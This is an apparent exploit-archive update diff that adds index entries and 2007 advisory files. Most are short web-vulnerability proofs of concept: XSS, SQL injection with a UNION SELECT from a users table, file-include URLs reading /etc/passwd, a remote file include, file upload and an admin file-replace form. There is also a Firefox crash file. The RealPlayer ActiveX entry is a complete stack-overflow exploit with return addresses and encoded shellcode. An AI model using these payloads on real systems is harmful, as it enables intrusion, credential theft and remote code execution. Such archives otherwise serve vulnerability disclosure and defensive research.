Updated 01_06_2014

files.csv

@@ -27530,3 +27530,21 @@ id,file,description,date,author,platform,type,port
 30684,platforms/php/webapps/30684.txt,"SiteBar <= 3.3.8 integrator.php lang Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
 30685,platforms/php/webapps/30685.txt,"SiteBar <= 3.3.8 index.php target Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
 30686,platforms/php/webapps/30686.txt,"SiteBar <= 3.3.8 command.php Modify User Action uid Parameter XSS",2007-10-18,"Robert Buchholz",php,webapps,0
+30691,platforms/php/webapps/30691.txt,"Alacate-Lucent OmniVista 4760 Multiple Cross Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0
+30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 ierpplug.dll ActiveX Control Import Playlist Name Stack Buffer Overflow Vulnerability",2007-10-18,anonymous,windows,remote,0
+30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0
+30694,platforms/php/webapps/30694.txt,"SocketMail 2.2.1 Lostpwd.PHP Cross-Site Scripting Vulnerability",2007-10-19,"Ivan Sanchez",php,webapps,0
+30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 rnote.PHP Multiple Cross Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0
+30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 Filename.ASP Cross-Site Scripting Vulnerability",2007-10-20,"Aria-Security Team",asp,webapps,0
+30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 Index.PHP Local File Include Vulnerability",2007-10-20,sekuru,php,webapps,0
+30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module Unauthorized Access Vulnerability",2007-10-22,KiNgOfThEwOrLd,php,webapps,0
+30699,platforms/php/webapps/30699.txt,"Hackish 1.1 Blocco.PHP Cross-Site Scripting Vulnerability",2007-10-22,Matrix86,php,webapps,0
+30700,platforms/php/webapps/30700.txt,"DMCMS 0.7 Index.PHP SQL Injection Vulnerability",2007-10-22,"Aria-Security Team",php,webapps,0
+30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 Download.PHP Local File Include Vulnerability",2007-10-22,hack2prison,php,webapps,0
+30702,platforms/multiple/dos/30702.html,"Mozilla Firefox 2.0.0.7 Malformed XBL Constructor Remote Denial of Service Vulnerability",2007-10-22,"Soroush Dalili",multiple,dos,0
+30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting Arbitrary File Upload Vulnerability",2007-10-23,"Pete Houston",php,webapps,0
+30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0
+30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0
+30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Vulnerability",2007-10-24,"Aria-Security Team",asp,webapps,0
+30707,platforms/php/webapps/30707.txt,"Phpbasic basicFramework 1.0 Includes.PHP Remote File Include Vulnerability",2007-10-24,Alucar,php,webapps,0
+30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 Page.ASP SQL Injection Vulnerability",2007-10-25,joseph.giron13,asp,webapps,0

platforms/asp/webapps/30696.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26142/info
+
+SearchSimon Lite is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example/filename.asp?QUERY=[XSS]&Submit=Search%21&ACTION=SEARCH 

platforms/asp/webapps/30706.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26193/info
+
+CodeWidgets Web Based Alpha Tabbed Address Book is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.asp?alpha=[SQL INJECTION] 

platforms/asp/webapps/30708.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26207/info
+
+Aleris Web Publishing Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Aleris Web Publishing Server 3.0 is vulnerable; other versions may also be affected. 
+
+www.example.com/calendar/page.asp?mode=1%20union%20all%20select%201,2,3,4,5,6%20FROM%20users-- 

platforms/jsp/webapps/30704.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26182/info
+
+GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process. 
+
+http://www.example.com/ghboard/component/flashupload/download.jsp?name=[file_name]
+
+http://www.example.com/ghboard/component/flashupload/download.jsp?name=../config.js

platforms/jsp/webapps/30705.txt

@@ -0,0 +1,5 @@
+source: http://www.securityfocus.com/bid/26182/info
+ 
+GHBoard is prone to multiple vulnerabilities that let attackers upload and download arbitrary files and execute arbitrary code within the context of the webserver process.
+ 
+http://www.example.com/ghboard/component/flashupload/data/upload_filename.xxx 

platforms/multiple/dos/30702.html

@@ -0,0 +1,72 @@
+source: http://www.securityfocus.com/bid/26172/info
+
+Mozilla Firefox is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input.
+
+Attackers can exploit this issue to cause denial-of-service conditions.
+
+Firefox 2.0.0.7 is vulnerable; other versions may also be affected. 
+
+i######################### WwW.BugReport.ir #########################
+#
+#      AmnPardaz Security Research & Penetration Testing Group
+#
+# Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service
+# Vendor URL: www.mozilla.org
+# Version: <= 2.0.0.7
+# Fix Available: Yes!
+# Soloution: Update to 2.0.0.8
+# Note: This bug works on 2.0.0.8 in different way. Although this bug doesn't crash 2.0.0.8, it causes not showing html code by viewing source in Mozilla Firefox 2.0.0.8 and this is another bug on 2.0.0.8!
+# Proof: http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm
+#
+######################### WwW.AmnPardaz.com ########################
+#
+# Leaders : Shahin Ramezany & Sorush Dalili
+# Team Members: Amir Hossein Khonakdar, Hamid Farhadi
+# Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com
+# Country: Iran
+# Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net
+# Contacts: <th3_vampire {4-t] yahoo [d-0-t} com> & <Irsdl {4-t] yahoo [d-0-t} com>
+# 
+######################## Bug Description ###########################
+#
+# To do this work we need 2 files (Html,XML).
+# Their codes was written below.
+#
+# Save below codes in a HTML file.
+#
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+<html>
+	<head>
+		<style>BODY{-moz-binding:url("moz.xml#xss")}</style>
+	</head>
+	<body>
+		Suddenly see you baby! If you see this bug execution was failed!
+		<script>
+			alert('Soroush Dalili & Shahin Ramezani From Astalavista.ir')
+		</script>
+	</body>
+</html>
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+#
+# Save below codes in "moz.xml" file.
+#
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+<?xml version="1.0"?>
+<bindings xmlns="http://www.mozilla.org/xbl">
+  <binding id="xss">
+    <implementation>
+      <constructor><![CDATA[
+		eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29'));		
+  	  ]]></constructor>
+    </implementation>
+  </binding>
+</bindings>
+--------------------------------------------------------------------
+--------------------------------------------------------------------
+#
+# Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.7 it will be crashed and by Mozilla FireFox 2.0.0.8 no code will be showed by viewing the source.
+#
+###################################################################

platforms/php/webapps/30691.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/26128/info
+
+OmniVista 4760 is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.somesite.com/?Langue="><script>alert("xss")</script><" 
+http://www.somesite.com/php-bin/Webclient.php?action=<script>alert("xss")</script> 

platforms/php/webapps/30693.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26136/info
+
+SocketKB is prone to multiple cross-site scripting vulnerabilities.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect SocketKB 1.1.5; other versions may also be affected. 
+
+http://www.example.com/[PATH]/?__f=article&art_id=###[XSS]&node=###[XSS]

platforms/php/webapps/30694.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26138/info
+
+SocketMail is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/path/lostpwd.php?lost_id=[XSS] 

platforms/php/webapps/30695.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26140/info
+
+rNote is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
+
+rNote 0.9.7.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/rnote/rnote.php?d=<script>alert("RxH")</script 
+http://www.example.com/rnote/rnote.php?u=<script>alert("RxH")</script 

platforms/php/webapps/30697.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26143/info
+
+ReloadCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to execute local scripts or to view arbitrary files that may contain sensitive information that can aid in further attacks. 
+
+http://www.example.com/index.php?module=../../../../etc/passwd 

platforms/php/webapps/30698.txt

@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/26155/info
+
+Flatnuke3 is prone to an unauthorized-access vulnerability because it fails to adequately verify administrative credentials while logging in via the 'File Manager' module.
+
+An attacker can exploit this vulnerability to gain administrative control of the application; other attacks are also possible.
+
+This issue affects Flatnuke3-2007-10-10; other versions may also be vulnerable. 
+
+Full Path Disclosure Example:
+
+http://www.example.com/flatnuke3_path/index.php?mod=[forum_path]
+&op=disc&argumentname=[a_casual_char]
+---------------------------------------------------------------
+File Replace Exploit:
+
+<form method="post" action="http://www.example.com/flatnuke3_path/index.php?
+mod=none_filemanager&amp;op="><textarea id="body" name="body" cols="90" rows="
+35">
+&lt;/textarea&gt;<br><input value="Save" type="submit"><input type="reset">
+<input name="opmod" value="save" type="hidden">
+<input name="ffile" value="[file_name].php" type="hidden">
+<input name="dir" value="/[script_path]/[file_path]" type="hidden"><input
+class="button" onclick="history.back()" value="Annulla" type="button"></form>
+---------------------------------------------------------------
+User Credential View/Edit Exploit:
+
+http://www.example.com/flatnuke3_path/index.php?mod=none_filemanager&dir=/
+[script_path]/[flatnuke3_path]/misc/fndatabase/users/&ffile=[username].
+php&opmod=open&op=
+
+Or, for example u can view and edit a file located on the server:
+
+http://www.example.com/flatnuke3_path/index.php?mod=none_filemanager&dir=/
+[script_path]/&ffile=[file]&opmod=open&op=
+

platforms/php/webapps/30699.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26167/info
+
+Hackish is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Hackish BETA 1.1 is vulnerable to this issue; other versions may also be affected.
+
+http://www.example.com/hackish/shoutbox/blocco.php?go_shout=Matrix86%3C/a%3E%3C/p%3E%3C/div%3E%3Chtml%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C/html%3E

platforms/php/webapps/30700.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26169/info
+
+DMCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects DMCMS 0.7.0; other versions may also be affected. 
+
+http://www.example.com/index.php?page=media&id=[SQL INJECTION CODE GOES HERE] 

platforms/php/webapps/30701.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/26171/info
+
+Jeebles Directory is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to execute local scripts or to view arbitrary files that may contain sensitive information that can aid in further attacks.
+
+This issue affects Jeebles Directory 2.9.60; other versions may also be affected. 
+
+
+http://www.example.com/[path]/download.php?settings2.inc.php 

platforms/php/webapps/30703.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26179/info
+
+Japanese PHP Gallery Hosting is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Versions of Japanese PHP Gallery Hosting released prior to 10/2007 are vulnerable.
+
+http://www.example.com/upload/upload.php?ServerPath=http://www.example2.com/malicious.php.arbitraryextension 

platforms/php/webapps/30707.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26194/info
+
+basicFramework is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+This issue affects basicFramework 1.0; other versions may also be vulnerable. 
+
+http://www.example.com/includes.php?root=[shell] 

platforms/windows/remote/30692.js

@@ -0,0 +1,167 @@
+source: http://www.securityfocus.com/bid/26130/info
+
+RealPlayer is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks of user-supplied input before copying it to an insufficiently sized memory buffer.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the application using the affected control (typically Internet Explorer). Successful attacks can compromise the application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. 
+
+<script language="javascript">
+
+eval("function RealExploit()
+
+{
+
+var user = navigator.userAgent.toLowerCase();
+
+if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
+
+  return;
+
+if(user.indexOf("nt 5.")==-1)
+
+  return;
+
+VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
+
+try
+
+{
+
+  Real = new ActiveXObject(VulObject);
+
+}catch(error)
+
+{
+
+  return;
+
+}
+
+RealVersion = Real.PlayerProperty("PRODUCTVERSION");
+
+Padding = "";
+
+JmpOver = unescape("%75%06%74%04");
+
+for(i=0;i<32*148;i++)
+
+  Padding += "S";
+
+ 
+
+ 
+
+if(RealVersion.indexOf("6.0.14.") == -1)
+
+{
+
+  if(navigator.userLanguage.toLowerCase() == "zh-cn")
+
+   ret = unescape("%7f%a5%60");
+
+  else if(navigator.userLanguage.toLowerCase() == "en-us")
+
+   ret = unescape("%4f%71%a4%60");
+
+  else
+
+   return;
+
+}
+
+else if(RealVersion == "6.0.14.544")
+
+  ret = unescape("%63%11%08%60");
+
+else if(RealVersion == "6.0.14.550")
+
+  ret = unescape("%63%11%04%60");
+
+else if(RealVersion == "6.0.14.552")
+
+  ret = unescape("%79%31%01%60");
+
+else if(RealVersion == "6.0.14.543")
+
+  ret = unescape("%79%31%09%60");
+
+else if(RealVersion == "6.0.14.536")
+
+  ret = unescape("%51%11%70%63");
+
+else
+
+  return;
+
+ 
+
+ 
+
+ 
+
+if(RealVersion.indexOf("6.0.10.") != -1)
+
+{
+
+  for(i=0;i<4;i++)
+
+   Padding = Padding + JmpOver;
+
+  Padding = Padding + ret;
+
+}
+
+else if(RealVersion.indexOf("6.0.11.") != -1)
+
+{
+
+  for(i=0;i<6;i++)
+
+   Padding = Padding + JmpOver;
+
+  Padding = Padding + ret;
+
+}
+
+else if(RealVersion.indexOf("6.0.12.") != -1)
+
+{
+
+  for(i=0;i<9;i++)
+
+   Padding = Padding + JmpOver;
+
+  Padding = Padding + ret;
+
+}
+
+else if(RealVersion.indexOf("6.0.14.") != -1)
+
+{
+
+  for(i=0;i<10;i++)
+
+   Padding = Padding + JmpOver;
+
+   Padding = Padding + ret;
+
+}
+
+ 
+
+AdjESP = "LLLL\\XXXXXLD";
+
+Shell = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp";
+
+PayLoad = Padding + AdjESP + Shell;
+
+while(PayLoad.length < 0x8000)
+
+  PayLoad += "YuanGe"; // ?~??~-.=!
+
+Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
+
+}
+
+RealExploit();")
+
+</script>